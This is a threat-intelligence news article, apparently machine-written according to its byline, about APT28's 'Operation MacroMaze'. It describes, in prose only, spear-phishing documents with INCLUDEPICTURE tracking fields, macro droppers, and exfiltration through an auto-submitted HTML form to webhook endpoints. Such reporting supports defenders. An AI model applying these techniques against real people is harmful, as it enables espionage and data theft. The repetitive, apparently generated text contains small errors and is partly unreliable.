Ethical Hacking News
APT28 has launched a new webhook-based covert data exfiltration campaign called Operation MacroMaze, using spear-phishing emails and macro malware to steal sensitive information from European targets. The attackers used standard HTML features to send stolen data while leaving minimal traces on disk, maximizing stealth. This campaign is another example of the group's ongoing efforts to evade detection and continue targeting sensitive information across Europe.
Operation MacroMaze is a web-based covert data exfiltration campaign attributed to Russia-linked APT28 (UAC-0001, Fancy Bear, etc.) launched in September 2025.The campaign used spear-phishing emails with "INCLUDEPICTURE" fields pointing to webhooks to evade detection and exfiltrate sensitive data.Webhook-based attack chain utilized heavy string concatenation to hide malicious commands.Variant macros dropped malware and deployed additional payloads on compromised systems between September 2025 and January 2026.The attackers employed a browser-based exfiltration method, sending stolen data without user interaction.The campaign is part of APT28's ongoing efforts to evade detection and target sensitive information across Europe.
Operation MacroMaze is a recent web-based covert data exfiltration campaign attributed to Russia-linked APT28, also known as UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM. The campaign was launched in September 2025 and continued until January 2026, targeting select entities in Western and Central Europe. This article delves into the specifics of Operation MacroMaze, a complex attack chain that utilized webhooks to evade detection and exfiltrate sensitive data.
The campaign began with spear-phishing emails that delivered weaponized documents containing an “INCLUDEPICTURE” field pointing to a webhook[.]site URL hosting a JPG. This behavior functions as a tracking mechanism: when the document is opened and Word processes the INCLUDEPICTURE field, an outbound HTTP request is generated to the remote server, allowing attackers to log metadata associated with the request. The attackers used heavy string concatenation to hide key commands within this macro, making it difficult for security software to detect.
Once a victim opened the document, the macro silently retrieved the image, acting like a tracking pixel that alerted attackers that the document had been viewed. Variants of this macro were used between September 2025 and January 2026, which modified macros to drop malware and deploy additional payloads on compromised systems. Researchers identified four closely related macro variants acting as droppers, each dropping six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names tied to a webhook[.]site C2 path.
The attackers used standard HTML features to send stolen data while leaving minimal traces on disk. A browser-based exfiltration method was employed in this campaign. The final HTML file was constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template. When rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction.
This campaign proves that simplicity can be powerful. The attacker uses basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximize stealth. Although specific command files used to gather system data were not recovered, similar operations attributed to APT28 by CERT Polska and the Computer Emergency Response Team of Ukraine suggest that this stage likely deployed a lightweight reconnaissance script, collecting basic host details such as IP address, directory listings, and system environment information before exfiltration.
The APT28 group has been active since at least 2007, targeting governments, militaries, and security organizations worldwide. The group was involved in the string of attacks that targeted the 2016 Presidential election. In January 2026, Zscaler ThreatLabz uncovered another campaign targeting Central and Eastern Europe, called Operation Neusploit, which used weaponized RTF files and localized lures to deploy MiniDoor, PixyNetLoader, and Covenant Grunt implants.
The APT28 group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS). The group's involvement in Operation MacroMaze highlights their ongoing efforts to evade detection and continue targeting sensitive information across Europe. This campaign serves as a reminder of the importance of vigilance in protecting against such covert data exfiltration tactics.
Related Information:
https://www.ethicalhackingnews.com/articles/Operation-MacroMaze-APT28s-Webhook-Based-Covert-Data-Exfiltration-Campaign-ehn.shtml
Published: Tue Feb 24 04:04:37 2026 by llama3.2 3B Q4_K_M
